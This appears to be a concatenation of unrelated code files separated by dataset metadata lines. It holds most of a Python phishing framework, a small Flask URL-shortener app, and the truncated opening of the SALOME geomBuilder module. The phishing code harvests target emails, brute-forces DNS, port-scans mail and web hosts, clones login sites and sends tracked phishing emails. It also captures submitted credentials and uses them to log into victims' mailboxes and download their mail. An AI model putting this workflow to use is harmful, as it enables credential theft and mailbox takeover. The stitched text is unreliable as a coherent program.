# self.display.verbose("Gathered [%s] email addresses from Recon-NG" % (len(temp_list)))
# self.email_list += temp_list
# sort/unique email list
self.email_list = Utils.unique_list(self.email_list)
self.email_list.sort()
# add each user to the sqllite db
self.db.addUsers(self.email_list)
# print list of email addresses
self.display.verbose("Collected [%s] unique email addresses" % (len(self.email_list)))
self.display.print_list("EMAIL LIST",self.email_list)
for email in self.email_list:
self.display.log(email + "\n", filename="email_targets.txt")
#----------------------------
# Gather dns hosts
#----------------------------
def gather_dns(self):
# are required flags set?
if (self.config["gather_dns"] == True):
print
self.display.output("Obtaining list of host on the %s domain" % (self.config["domain_name"]))
self.display.verbose("Gathering hosts via built-in methods")
# Gather hosts from internet search
self.display.verbose(Gather.get_sources())
if (not self.gather):
self.gather = Gather(self.config["domain_name"], display=self.display)
temp_list = self.gather.hosts()
self.display.verbose("Gathered [%s] hosts from the Internet Search" % (len(temp_list)))
self.hostname_list += temp_list
# Gather hosts from DNS lookups
temp_list = Dns.xfr(self.config["domain_name"])
self.display.verbose("Gathered [%s] hosts from DNS Zone Transfer" % (len(temp_list)))
self.hostname_list += temp_list
temp_list = Dns.ns(self.config["domain_name"])
temp_list = Utils.filterList(temp_list, self.config["domain_name"])
self.display.verbose("Gathered [%s] hosts from DNS NS lookups" % (len(temp_list)))
self.hostname_list += temp_list
temp_list = Dns.mx(self.config["domain_name"])
temp_list = Utils.filterList(temp_list, self.config["domain_name"])
self.display.verbose("Gathered [%s] hosts from DNS MX lookups" % (len(temp_list)))
self.hostname_list += temp_list
# Gather hosts from dictionary lookup
try:
temp_list = Dns.brute(self.config["domain_name"], display=self.display)
except:
pass
self.display.verbose("Gathered [%s] hosts from DNS BruteForce/Dictionay Lookup" % (len(temp_list)))
self.hostname_list += temp_list
# sort/unique hostname list
self.hostname_list = Utils.unique_list(self.hostname_list)
self.hostname_list.sort()
# add list of identified hosts to sqllite db
self.db.addHosts(self.hostname_list)
# print list of hostnames
self.display.verbose("Collected [%s] unique host names" % (len(self.hostname_list)))
self.display.print_list("HOST LIST", self.hostname_list)
#----------------------------
# Perform Port Scans
#----------------------------
def port_scan(self):
# are required flags set?
if (self.config["gather_dns"] == True):
self.display.output("Performing basic port scans of any identified hosts.")
# define list of ports to scan for
ports = [25, 80,110, 143, 443, 993, 995]
# prep array of arrays
for port in ports:
self.server_list[port] = []
# for each host in the host list
for host in self.hostname_list:
# run port scan
openports = portscan.scan(host, ports)
found = False
# for any open ports, add it to the associated list
for port in openports:
self.db.addPort(port, host)
if (port == 80):
self.display.verbose("Found website at: %s 80" % (host))
self.server_list[80].append(host)
found = True
elif (port == 443):
self.display.verbose("Found website at: %s 443" % (host))
self.server_list[443].append(host)
found = True
elif (port == 110):
self.display.verbose("Found POP at : %s 110" % (host))
self.server_list[110].append(host)
found = True
elif (port == 995):
self.display.verbose("Found POPS at : %s 995" % (host))
self.server_list[995].append(host)
found = True
elif (port == 143):
self.display.verbose("Found IMAP at : %s 143" % (host))
self.server_list[143].append(host)
found = True
elif (port == 993):
self.display.verbose("Found IMAPS at : %s 993" % (host))
self.server_list[993].append(host)
found = True
elif (port == 25):
self.display.verbose("Found SMTP at : %s 25" % (host))
self.server_list[25].append(host)
found = True
if (found):
self.display.log(host + "\n", filename="hosts.txt")
#----------------------------
# Profile Web Sites
#----------------------------
def profile_site(self):
# are required flags set?
if (self.config["profile_domain"] == True):
self.display.output("Determining if any of the identified hosts have web servers.")
# for hosts in the port 80 list
for host in self.server_list[80]:
# create a profiler object
p = profiler()
# run it against the website
profile_results = p.run("http://" + host, debug=False)
# if we got valid results, look to see if we have a match for one of the templates
if (profile_results and (len(profile_results) > 0)):
max_key = ""
max_value = 0
for key, value in profile_results:
if (value.getscore() > max_value):
max_key = key
max_value = value.getscore()
if (max_value > 0):
self.display.verbose("POSSIBLE MATCH FOR [http://%s] => [%s]" % (host, max_key))
self.profile_valid_web_templates.append(max_key)
else:
# other wise we will see about adding it to a list of sites to clone
if (p.hasLogin("http://" + host)):
self.profile_dynamic_web_templates.append("http://" + host)
# repeat same as for port 80
for host in self.server_list[443]:
p = profiler()
profile_results = p.run("https://" + host, debug=False)
if (profile_results and (len(profile_results) > 0)):
max_key = ""
max_value = 0
for key, value in profile_results:
if (value.getscore() > max_value):
max_key = key
max_value = value.getscore()
if (max_value > 0):
self.display.verbose("POSSIBLE MATCH FOR [https://%s] => [%s]" % (host, max_key))
self.profile_valid_web_templates.append(max_key)
else:
if (p.hasLogin("https://" + host)):
self.display.verbose("POSSIBLE DYNAMIC TEMPLATE SITE [https://%s]" % (host))
self.profile_dynamic_web_templates.append("https://" + host)
# sort/unique list of valid templates
self.profile_valid_web_templates = Utils.unique_list(self.profile_valid_web_templates)
self.profile_valid_web_templates.sort()
# print list of valid templatess
self.display.verbose("Collected [%s] valid web templates" % (len(self.profile_valid_web_templates)))
self.display.print_list("VALID TEMPLATE LIST",self.profile_valid_web_templates)
# sort/unique list of dynamic templates
self.profile_dynamic_web_templates = Utils.unique_list(self.profile_dynamic_web_templates)
self.profile_dynamic_web_templates.sort()
# print list of valid templatess
self.display.verbose("Collected [%s] dynamic web templates" % (len(self.profile_dynamic_web_templates)))
self.display.print_list("DYNAMIC TEMPLATE LIST",self.profile_dynamic_web_templates)
# sort/unique hostname list
self.profile_dynamic_web_templates = Utils.lowercase_list(self.profile_dynamic_web_templates)
self.profile_dynamic_web_templates = Utils.unique_list(self.profile_dynamic_web_templates)
self.profile_dynamic_web_templates.sort()
# for any dynamic sites, try to clone them
self.display.output("Cloning any DYNAMIC sites")
for template in self.profile_dynamic_web_templates:
sc = SiteCloner(clone_dir=self.outdir+"web_clones/")
tdir = sc.cloneUrl(template)
self.display.verbose("Cloning [%s] to [%s]" % (template, tdir))
self.db.addWebTemplate(ttype="dynamic", src_url=template, tdir=tdir)
# loop over all built in templates
for f in os.listdir(self.config["web_template_path"]):
template_file = os.path.join(self.config["web_template_path"], f) + "/CONFIG"
for line in open(template_file).readlines():
for tem in self.profile_valid_web_templates:
if re.match("^VHOST=\s*"+tem+"\s*$", line, re.IGNORECASE):
self.db.addWebTemplate(ttype="static", src_url="", tdir=os.path.join(self.config["web_template_path"], f))
break
#----------------------------
# Select Web Templates
#----------------------------
def select_web_templates(self):
templates = []
# get lists of current templates
db_static_templates = self.db.getWebTemplates(ttype="static")
db_dynamic_templates = self.db.getWebTemplates(ttype="dynamic")
# check to see if we have templates
if (db_static_templates or db_dynamic_templates):
for template in db_static_templates:
parts = template.split("[-]")
template_file = parts[0] + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
templates.append(("static", parts[0], parts[1]))
for template in db_dynamic_templates:
parts = template.split("[-]")
template_file = parts[0] + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
templates.append(("dynamic", parts[0], parts[1]))
else:
# assume we do not have any valid templates
# load all standard templates
for f in os.listdir(self.config["web_template_path"]):
template_file = os.path.join(self.config["web_template_path"], f) + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
templates.append(("static", os.path.join(self.config["web_template_path"], f), ""))
print "FIXED = [%s]" % (os.path.join(self.config["web_template_path"], f))
# if "always yes" is enabled then just use all templates
if (not self.config["always_yes"]):
items = self.display.selectlist("Please select (comma seperated) the item(s) you wish to use. : ", templates)
templates_temp = []
self.db.clearWebTemplates()
for item in items:
print templates[int(item)-1]
templates_temp.append(templates[int(item)-1])
self.db.addWebTemplate(ttype=templates[int(item)-1][0], src_url=templates[int(item)-1][2], tdir=templates[int(item)-1][1])
templates = templates_temp
# print list of enabled templates
self.display.print_list("TEMPLATE LIST", templates)
#----------------------------
# Load web sites
#----------------------------
def load_websites(self):
# a required flags set?
if self.config["enable_web"] == True:
self.select_web_templates()
print
self.display.output("Starting phishing webserver")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
path = os.path.dirname(os.path.realpath(__file__))
# Start process
cmd = [path + "/../web.py", Utils.compressDict(self.config)]
self.webserver = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE)
# monitor output to gather website information
while True:
line = self.webserver.stdout.readline()
line = line.strip()
if line == 'Websites loaded and launched.':
break
if line != '':
self.display.verbose(line)
match=re.search("Started website", line)
VHOST = ""
PORT = ""
if match:
parts=line.split("[")
VHOST=parts[1].split("]")
VHOST=VHOST[0].strip()
PORT=parts[2].split("]")
PORT=PORT[0].strip()
PORT=PORT[7:]
# keep the URL clean
# if port is 80, then it does not need to be included in the URL
if (PORT[-3:] == ":80"):
PORT = PORT[:-3]
self.config[VHOST + "_port"] = PORT
self.config[VHOST + "_vhost"] = VHOST
Utils.screenCaptureWebSite("http://" + PORT,
self.outdir + "screenshots/" + PORT + "_" + VHOST + ".png")
Utils.screenCaptureWebSite("http://" + VHOST + "." + self.config["phishing_domain"],
self.outdir + "screenshots/" + VHOST + "." + self.config["phishing_domain"] + ".png")
# Write PID file
pidfilename = os.path.join(self.pid_path, "spfwebsrv.pid")
pidfile = open(pidfilename, 'w')
pidfile.write(str(self.webserver.pid))
pidfile.close()
self.webserverpid = self.webserver.pid
self.display.verbose("Started WebServer with pid = [%s]" % self.webserver.pid)
#----------------------------
# Build array of email templates
#----------------------------
def load_email_templates(self):
# do we even have targets?
if (((self.email_list is not None)
and (self.email_list))
and ((self.config["enable_email_sending"] == True)
or (self.config["simulate_email_sending"] == True))):
print
self.display.verbose("Locating phishing email templates")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
# loop over each email template
for f in os.listdir("templates/email/"):
template_file = os.path.join("templates/email/", f)
self.display.debug("Found the following email template: [%s]" % template_file)
if ((Utils.is_readable(template_file)) and (os.path.isfile(template_file))):
# read in the template SUBJECT, TYPE, and BODY
TYPE = ""
SUBJECT = ""
BODY = ""
with open (template_file, "r") as myfile:
for line in myfile.readlines():
match=re.search("TYPE=", line)
if match:
TYPE=line.replace('"', "")
TYPE=TYPE.split("=")
TYPE=TYPE[1].lower().strip()
match2=re.search("SUBJECT=", line)
if match2:
SUBJECT=line.replace('"', "")
SUBJECT=SUBJECT.split("=")
SUBJECT=SUBJECT[1].strip()
match3=re.search("BODY=", line)
if match3:
BODY=line.replace('"', "")
BODY=BODY.replace(r'\n', "\n")
BODY=BODY.split("=")
BODY=BODY[1].strip()
self.email_templates[TYPE].append(EmailTemplate(TYPE, SUBJECT, BODY))
#----------------------------
# Generate/Send phishing emails
#----------------------------
def send_emails(self):
# are required flags set?
if ((self.config["enable_email_sending"] == True) or (self.config["simulate_email_sending"] == True)):
if ((self.config["determine_smtp"] == "1") and (self.config["use_specific_smtp"] == "1")):
self.display.error("ONLY 1 of DETERMINE_SMTP or USE_SPECIFIC_SMTP can be enabled at a time.")
else:
print
self.display.output("Sending phishing emails")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
templates_logged = []
#do we have any emails top send?
if self.email_list:
temp_target_list = self.email_list
temp_delay = 1
if (self.config["email_delay"] is not None):
temp_delay = int(self.config["email_delay"])
send_count = 0
# while there are still target email address, loop
while (temp_target_list and (send_count < (int(self.config["emails_max"])))):
# inc number of emails we have attempted to send
send_count = send_count + 1
# delay requested amount of time between sending emails
time.sleep(temp_delay)
# for each type of email (citrix, owa, office365, ...)
for key in self.email_templates:
# double check
if temp_target_list:
# for each email template of the given type
for template in self.email_templates[key]:
# double check
if temp_target_list:
# grab a new target email address
target = temp_target_list.pop(0)
self.display.verbose("Sending Email to [%s]" % target)
#FROM = "support@" + self.config["phishing_domain"]
FROM = self.config["smtp_fromaddr"]
SUBJECT = template.getSUBJECT()
BODY = template.getBODY()
# perform necessary SEARCH/REPLACE
if self.config["enable_host_based_vhosts"] == "1":
targetlink="http://" + key + "." + self.config["phishing_domain"]
if self.config["enable_user_tracking"] == "1":
targetlink += "?u=" + self.db.getUserTrackId(target)
BODY=BODY.replace(r'[[TARGET]]', targetlink)
else:
if (not key == "dynamic"):
targetlink="http://" + self.config[key+ "_port"]
if self.config["enable_user_tracking"] == "1":
targetlink += "?u=" + self.db.getUserTrackId(target)
BODY=BODY.replace(r'[[TARGET]]', targetlink)
# log
if (key not in templates_logged):
self.display.log("----------------------------------------------\n\n" +
"TO: <XXXXX>\n" +
"FROM: " + FROM + "\n" +
"SUBJECT: " + SUBJECT + "\n\n" +
BODY + "\n\n" +
"----------------------------------------------\n\n" +
"TARGETS:\n" +
"--------\n",
filename="email_template_" + key + ".txt")
templates_logged.append(key)
self.display.log(target + "\n", filename="email_template_" + key + ".txt")
# send the email
if (self.config["simulate_email_sending"] == True):
self.display.output("Would have sent an email to [%s] with subject of [%s], but this was just a test." % (target, SUBJECT))
else:
try:
if self.config["determine_smtp"] == "1":
emails.send_email_direct(target,
FROM,
self.config["smtp_displayname"],
SUBJECT,
BODY,
debug=True)
if self.config["use_specific_smtp"] == "1":
print self.config["smtp_fromaddr"]
emails.send_email_account(self.config["smtp_server"],
int(self.config["smtp_port"]),
self.config["smtp_user"],
self.config["smtp_pass"],
target,
self.config["smtp_fromaddr"],
self.config["smtp_displayname"],
SUBJECT,
BODY,
debug=True)
except:
self.display.error("Count not send email to " + target)
#----------------------------
# Monitor web sites
#----------------------------
def monitor_results(self):
# are required flags set?
if self.config["enable_web"] == True:
print
self.display.output("Monitoring phishing website activity!")
self.display.alert("(Press CTRL-C to stop collection and generate report!)")
if (self.webserver):
while True:
line = self.webserver.stdout.readline()
line = line.strip()
if (self.config["pillage_email"]):
self.pillage(line)
self.display.output(line)
#==================================================
# Secondary METHODS
#==================================================
#----------------------------
# Pillage Emails
#----------------------------
def pillage(self, line):
username = None
password = None
# parse line into username/password
usermatch = re.match(".*username=\['(.*?)'\].*", line)
if (usermatch):
username = usermatch.group(1)
passmatch = re.match(".*password=\['(.*?)'\].*", line)
if (passmatch):
password = passmatch.group(1)
# if no username or password, then return
if ((not username) or (not password)):
return
# is it a new username/password pair we have not seen before?
if (not username+":"+password in self.pillaged_users):
self.pillaged_users.append(username+":"+password)
# make a new MailPillager if one does not exist
if (not self.mp):
self.mp = MailPillager()
# attempt to determine the best Mail Server to use
if (not self.bestMailServer):
self.determineBestMailServer()
# if no Best Mail Server was identified, return
if (not self.bestMailServer):
self.display.error("No valid target IMAP/POP3 mail servers were identified.")
return
#print self.bestMailServer + ":" + str(self.bestMailServerPort)
# PILLAGE!!!
self.mp.pillage(username=username, password=password, server=self.bestMailServer,
port=self.bestMailServerPort, domain=self.config["domain_name"], outputdir=self.outdir + "pillage_data/")
#----------------------------
# See which Mail Server we should use
#
# TODO: needs to be updated!!!
#----------------------------
def determineBestMailServer(self):
if self.server_list[993]: # IMAPS
self.bestMailServerPort = 993
self.bestMailServer = self.server_list[993][0]
elif self.server_list[143]: #IMAP
self.bestMailServerPort = 143
self.bestMailServer = self.server_list[143][0]
elif self.server_list[995]: # POP3S
self.bestMailServerPort = 995
self.bestMailServer = self.server_list[995][0]
elif self.server_list[110]: # POP3
self.bestMailServerPort = 110
self.bestMailServer = self.server_list[110][0]
#==========================================================================================
#==========================================================================================
#==========================================================================================
#----------------------------
# Primary METHOD
#----------------------------
def run(self, argv):
# load config
self.parse_parameters(argv)
self.load_config()
# make directories
if not os.path.isdir(self.outdir + "reports/"):
os.makedirs(self.outdir + "reports/")
if not os.path.isdir(self.outdir + "logs/"):
os.makedirs(self.outdir + "logs/")
if not os.path.isdir(self.outdir + "screenshots/"):
os.makedirs(self.outdir + "screenshots/")
if not os.path.isdir(self.outdir + "web_clones/"):
os.makedirs(self.outdir + "web_clones/")
if not os.path.isdir(self.outdir + "pillage_data/"):
os.makedirs(self.outdir + "pillage_data/")
# dns/portscan/cloning
self.gather_dns()
self.port_scan()
self.profile_site()
# load websites
self.load_websites()
# do email stuff
self.prep_email()
self.load_email_templates()
self.send_emails()
# sit back and listen
self.monitor_results()
| bsd-3-clause | -8,369,864,212,482,959,000 | 47.741036 | 171 | 0.462257 | false |
aa-m-sa/summer-url-py | summerurlapp.py | 1 | 4031 | # a small URL shortening service
import psycopg2 # if we want to persistent strorage on heroku
from flask import Flask, request, Response, g, redirect, url_for, abort, render_template
from contextlib import closing
import os
import urlparse
import appconfig
import shortenid
APPSETTINGS_ENVVAR = 'SUMMER_APP_CONFIG'
app = Flask(__name__)
app.config.from_object(appconfig.DevelopmentConfig)
# override with env var (if it's been set)
app.config.from_object(os.environ[APPSETTINGS_ENVVAR])
def connect_db():
"""Connect to the database.
:returns: db connection obj
"""
if not app.config['DATABASE_URL']:
raise Exception('Database URL not set!')
urlparse.uses_netloc.append("postgres")
url = urlparse.urlparse(app.config['DATABASE_URL'])
conn = psycopg2.connect(
database=url.path[1:],
user=url.username,
password=url.password,
host=url.hostname,
port=url.port
)
return conn
def init_db():
"""Utility function to initialize the database with schema.sql.
"""
with connect_db() as conn:
with conn.cursor() as curs:
with open("schema.sql", "r") as sch_file:
curs.execute(sch_file.read())
conn.commit()
@app.before_request
def before_request():
g.db = connect_db()
@app.teardown_request
def teardown_request(exception):
db = getattr(g, 'db', None)
if db is not None:
db.close()
# routes:
# web views
@app.route('/', methods=['GET', 'POST'])
def main_page():
"""For GET request, show the webapp main page. For POST request, let
shorten() take care of shortening and show the shortened url"""
if request.method == 'GET':
return render_template('mainpage.html')
else:
textid = shorten().get_data()[0]
short_url = url_for('get_link', textid = textid, _external=True)
return render_template('shortened.html', shortened = short_url)
@app.route('/api/')
def api_description():
"""Show the api description page"""
return render_template('api_description.html')
# the underlying (public) api
@app.route('/api/shorten', methods=['POST'])
def shorten():
"""Shorten the URL contained in the parameter link, by
assigning an unique id to link and store both in the db.
:returns: text/plain Response object.
"""
if request.headers.get('Content-Type') != 'application/x-www-form-urlencoded':
raise Exception("received POST request Content-Type doesn't conform to API.")
# how this will work internally:
# db rows: id (integer), text (url)
# new link -> id++, add to db
# this ensures that two different links will not get the same id
# each integer id is mapped into an ASCII string (which is returned)
cur = g.db.cursor()
rawlink = request.form['link']
# crude but works in most cases
# TODO url normalization with urlnorm?
if not urlparse.urlparse(rawlink)[0]:
alink = 'http://' + rawlink
else:
alink = rawlink
cur.execute('insert into urls (url) values (%s) returning id', [alink])
g.db.commit()
idinteger = cur.fetchone()
if not idinteger:
raise Exception('inserting url into db failed')
textid = shortenid.to_text(idinteger[0])
return Response(textid, mimetype='text/plain')
@app.route('/api/<textid>', methods=['GET'])
def get_link(textid):
"""Redirect to the previously stored url, indentified by id.
:textid: the id
:returns: a redirect to the corresponding url
"""
# parse text id to integer
# fetch the url for that key from db
cur = g.db.cursor()
try:
integer_id = shortenid.to_int(textid)
except ValueError:
# current implementation returns only ids that can be converted to int
abort(404)
cur.execute('select url from urls where id = %s', [integer_id])
orig_url = cur.fetchone()
if not orig_url:
abort(404)
return redirect(orig_url[0], code=301)
if __name__ == '__main__':
app.run()
| mit | -2,764,560,846,763,436,500 | 26.609589 | 88 | 0.649219 | false |
FedoraScientific/salome-geom | src/GEOM_SWIG/geomBuilder.py | 1 | 644045 | # -*- coding: iso-8859-1 -*-
# Copyright (C) 2007-2014 CEA/DEN, EDF R&D, OPEN CASCADE
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# See http://www.salome-platform.org/ or email : [email protected]
#
# GEOM GEOM_SWIG : binding of C++ implementation with Python
# File : geomBuilder.py
# Author : Paul RASCLE, EDF
# Module : GEOM
"""
\namespace geomBuilder
\brief Module geomBuilder
"""
##
## @defgroup geomBuilder geomBuilder Python module
## @{
##
## @details
##
## By default, all functions of geomBuilder Python module do not publish
## resulting geometrical objects. This can be done in the Python script
## by means of \ref geomBuilder.geomBuilder.addToStudy() "addToStudy()"
## or \ref geomBuilder.geomBuilder.addToStudyInFather() "addToStudyInFather()"
## functions.
##
## However, it is possible to publish result data in the study
## automatically. For this, almost each function of
## \ref geomBuilder.geomBuilder "geomBuilder" class has
## an additional @a theName parameter (@c None by default).
## As soon as non-empty string value is passed to this parameter,
## the result object is published in the study automatically.
##
## For example, consider the following Python script:
##
## @code
## import salome
## from salome.geom import geomBuilder
## geompy = geomBuilder.New(salome.myStudy)
## box = geompy.MakeBoxDXDYDZ(100, 100, 100) # box is not published in the study yet
## geompy.addToStudy(box, "box") # explicit publishing
## @endcode
##
## Last two lines can be replaced by one-line instruction:
##
## @code
## box = geompy.MakeBoxDXDYDZ(100, 100, 100, theName="box") # box is published in the study with "box" name
## @endcode
##
## ... or simply
##
## @code
## box = geompy.MakeBoxDXDYDZ(100, 100, 100, "box") # box is published in the study with "box" name
## @endcode
##
## Note, that some functions produce more than one geometrical objects. For example,
## \ref geomBuilder.geomBuilder.GetNonBlocks() "GetNonBlocks()" function returns two objects:
## group of all non-hexa solids and group of all non-quad faces.
## For such functions it is possible to specify separate names for results.
##
## For example
##
## @code
## # create and publish cylinder
## cyl = geompy.MakeCylinderRH(100, 100, "cylinder")
## # get non blocks from cylinder
## g1, g2 = geompy.GetNonBlocks(cyl, "nonblock")
## @endcode
##
## Above example will publish both result compounds (first with non-hexa solids and
## second with non-quad faces) as two items, both named "nonblock".
## However, if second command is invoked as
##
## @code
## g1, g2 = geompy.GetNonBlocks(cyl, ("nonhexa", "nonquad"))
## @endcode
##
## ... the first compound will be published with "nonhexa" name, and second will be named "nonquad".
##
## Automatic publication of all results can be also enabled/disabled by means of the function
## \ref geomBuilder.geomBuilder.addToStudyAuto() "addToStudyAuto()". The automatic publishing
## is managed by the numeric parameter passed to this function:
## - if @a maxNbSubShapes = 0, automatic publishing is disabled.
## - if @a maxNbSubShapes = -1 (default), automatic publishing is enabled and
## maximum number of sub-shapes allowed for publishing is unlimited; any negative
## value passed as parameter has the same effect.
## - if @a maxNbSubShapes is any positive value, automatic publishing is enabled and
## maximum number of sub-shapes allowed for publishing is set to specified value.
##
## When automatic publishing is enabled, you even do not need to pass @a theName parameter
## to the functions creating objects, instead default names will be used. However, you
## can always change the behavior, by passing explicit name to the @a theName parameter
## and it will be used instead default one.
## The publishing of the collections of objects will be done according to the above
## mentioned rules (maximum allowed number of sub-shapes).
##
## For example:
##
## @code
## import salome
## from salome.geom import geomBuilder
## geompy = geomBuilder.New(salome.myStudy)
## geompy.addToStudyAuto() # enable automatic publication
## box = geompy.MakeBoxDXDYDZ(100, 100, 100)
## # the box is created and published in the study with default name
## geompy.addToStudyAuto(5) # set max allowed number of sub-shapes to 5
## vertices = geompy.SubShapeAll(box, geomBuilder.ShapeType['VERTEX'])
## # only 5 first vertices will be published, with default names
## print len(vertices)
## # note, that result value still containes all 8 vertices
## geompy.addToStudyAuto(-1) # disable automatic publication
## @endcode
##
## This feature can be used, for example, for debugging purposes.
##
## @note
## - Use automatic publication feature with caution. When it is enabled, any function of
## \ref geomBuilder.geomBuilder "geomBuilder" class publishes the results in the study,
## that can lead to the huge size of the study data tree.
## For example, repeating call of \ref geomBuilder.geomBuilder.SubShapeAll() "SubShapeAll()"
## command on the same main shape each time will publish all child objects, that will lead
## to a lot of duplicated items in the study.
## - Sub-shapes are automatically published as child items of the parent main shape in the study if main
## shape was also published before. Otherwise, sub-shapes are published as top-level objects.
## - Some functions of \ref geomBuilder.geomBuilder "geomBuilder" class do not have
## \a theName parameter (and, thus, do not support automatic publication).
## For example, some transformation operations like
## \ref geomBuilder.geomBuilder.TranslateDXDYDZ() "TranslateDXDYDZ()".
## Refer to the documentation to check if some function has such possibility.
##
## It is possible to customize the representation of the geometrical
## data in the data tree; this can be done by using folders. A folder can
## be created in the study tree using function
## \ref geomBuilder.geomBuilder.NewFolder() "NewFolder()"
## (by default it is created under the "Geometry" root object).
## As soon as folder is created, any published geometry object
## can be moved into it.
##
## For example:
##
## @code
## import salome
## from salome.geom import geomBuilder
## geompy = geomBuilder.New(salome.myStudy)
## box = geompy.MakeBoxDXDYDZ(100, 100, 100, "Box")
## # the box was created and published in the study
## folder = geompy.NewFolder("Primitives")
## # an empty "Primitives" folder was created under default "Geometry" root object
## geompy.PutToFolder(box, folder)
## # the box was moved into "Primitives" folder
## @endcode
##
## Subfolders are also can be created by specifying another folder as a parent:
##
## @code
## subfolder = geompy.NewFolder("3D", folder)
## # "3D" folder was created under "Primitives" folder
## @endcode
##
## @note
## - Folder container is just a representation layer object that
## deals with already published objects only. So, any geometry object
## should be published in the study (for example, with
## \ref geomBuilder.geomBuilder.PutToFolder() "addToStudy()" function)
## BEFORE moving it into any existing folder.
## - \ref geomBuilder.geomBuilder.PutToFolder() "PutToFolder()" function
## does not change physical position of geometry object in the study tree,
## it only affects on the representation of the data tree.
## - It is impossible to publish geometry object using any folder as father.
##
## \defgroup l1_publish_data
## \defgroup l1_geomBuilder_auxiliary
## \defgroup l1_geomBuilder_purpose
## @}
## @defgroup l1_publish_data Publishing results in SALOME study
## @defgroup l1_geomBuilder_auxiliary Auxiliary data structures and methods
## @defgroup l1_geomBuilder_purpose All package methods, grouped by their purpose
## @{
## @defgroup l2_import_export Importing/exporting geometrical objects
## @defgroup l2_creating Creating geometrical objects
## @{
## @defgroup l3_basic_go Creating Basic Geometric Objects
## @{
## @defgroup l4_curves Creating Curves
## @}
## @defgroup l3_3d_primitives Creating 3D Primitives
## @defgroup l3_complex Creating Complex Objects
## @defgroup l3_groups Working with groups
## @defgroup l3_blocks Building by blocks
## @{
## @defgroup l4_blocks_measure Check and Improve
## @}
## @defgroup l3_sketcher Sketcher
## @defgroup l3_advanced Creating Advanced Geometrical Objects
## @{
## @defgroup l4_decompose Decompose objects
## @defgroup l4_decompose_d Decompose objects deprecated methods
## @defgroup l4_access Access to sub-shapes by their unique IDs inside the main shape
## @defgroup l4_obtain Access to sub-shapes by a criteria
## @defgroup l4_advanced Advanced objects creation functions
## @}
## @}
## @defgroup l2_transforming Transforming geometrical objects
## @{
## @defgroup l3_basic_op Basic Operations
## @defgroup l3_boolean Boolean Operations
## @defgroup l3_transform Transformation Operations
## @defgroup l3_transform_d Transformation Operations deprecated methods
## @defgroup l3_local Local Operations (Fillet, Chamfer and other Features)
## @defgroup l3_blocks_op Blocks Operations
## @defgroup l3_healing Repairing Operations
## @defgroup l3_restore_ss Restore presentation parameters and a tree of sub-shapes
## @}
## @defgroup l2_measure Using measurement tools
## @defgroup l2_field Field on Geometry
## @}
# initialize SALOME session in try/except block
# to avoid problems in some cases, e.g. when generating documentation
try:
import salome
salome.salome_init()
from salome import *
except:
pass
from salome_notebook import *
import GEOM
import math
import os
import functools
from salome.geom.gsketcher import Sketcher3D, Sketcher2D, Polyline2D
# service function
def _toListOfNames(_names, _size=-1):
l = []
import types
if type(_names) in [types.ListType, types.TupleType]:
for i in _names: l.append(i)
elif _names:
l.append(_names)
if l and len(l) < _size:
for i in range(len(l), _size): l.append("%s_%d"%(l[0],i))
return l
# Decorator function to manage transactions for all geometric operations.
def ManageTransactions(theOpeName):
def MTDecorator(theFunction):
# To keep the original function name an documentation.
@functools.wraps(theFunction)
def OpenCallClose(self, *args, **kwargs):
# Open transaction
anOperation = getattr(self, theOpeName)
anOperation.StartOperation()
try:
# Call the function
res = theFunction(self, *args, **kwargs)
# Commit transaction
anOperation.FinishOperation()
return res
except:
# Abort transaction
anOperation.AbortOperation()
raise
return OpenCallClose
return MTDecorator
## Raise an Error, containing the Method_name, if Operation is Failed
## @ingroup l1_geomBuilder_auxiliary
def RaiseIfFailed (Method_name, Operation):
if Operation.IsDone() == 0 and Operation.GetErrorCode() != "NOT_FOUND_ANY":
raise RuntimeError, Method_name + " : " + Operation.GetErrorCode()
## Return list of variables value from salome notebook
## @ingroup l1_geomBuilder_auxiliary
def ParseParameters(*parameters):
Result = []
StringResult = []
for parameter in parameters:
if isinstance(parameter, list):
lResults = ParseParameters(*parameter)
if len(lResults) > 0:
Result.append(lResults[:-1])
StringResult += lResults[-1].split(":")
pass
pass
else:
if isinstance(parameter,str):
if notebook.isVariable(parameter):
Result.append(notebook.get(parameter))
else:
raise RuntimeError, "Variable with name '" + parameter + "' doesn't exist!!!"
pass
else:
Result.append(parameter)
pass
StringResult.append(str(parameter))
pass
pass
if Result:
Result.append(":".join(StringResult))
else:
Result = ":".join(StringResult)
return Result
## Return list of variables value from salome notebook
## @ingroup l1_geomBuilder_auxiliary
def ParseList(list):
Result = []
StringResult = ""
for parameter in list:
if isinstance(parameter,str) and notebook.isVariable(parameter):
Result.append(str(notebook.get(parameter)))
pass
else:
Result.append(str(parameter))
pass
StringResult = StringResult + str(parameter)
StringResult = StringResult + ":"
pass
StringResult = StringResult[:len(StringResult)-1]
return Result, StringResult
## Return list of variables value from salome notebook
## @ingroup l1_geomBuilder_auxiliary
def ParseSketcherCommand(command):
Result = ""
StringResult = ""
sections = command.split(":")
for section in sections:
parameters = section.split(" ")
paramIndex = 1
for parameter in parameters:
if paramIndex > 1 and parameter.find("'") != -1:
parameter = parameter.replace("'","")
if notebook.isVariable(parameter):
Result = Result + str(notebook.get(parameter)) + " "
pass
else:
raise RuntimeError, "Variable with name '" + parameter + "' doesn't exist!!!"
pass
pass
else:
Result = Result + str(parameter) + " "
pass
if paramIndex > 1:
StringResult = StringResult + parameter
StringResult = StringResult + ":"
pass
paramIndex = paramIndex + 1
pass
Result = Result[:len(Result)-1] + ":"
pass
Result = Result[:len(Result)-1]
return Result, StringResult
## Helper function which can be used to pack the passed string to the byte data.
## Only '1' an '0' symbols are valid for the string. The missing bits are replaced by zeroes.
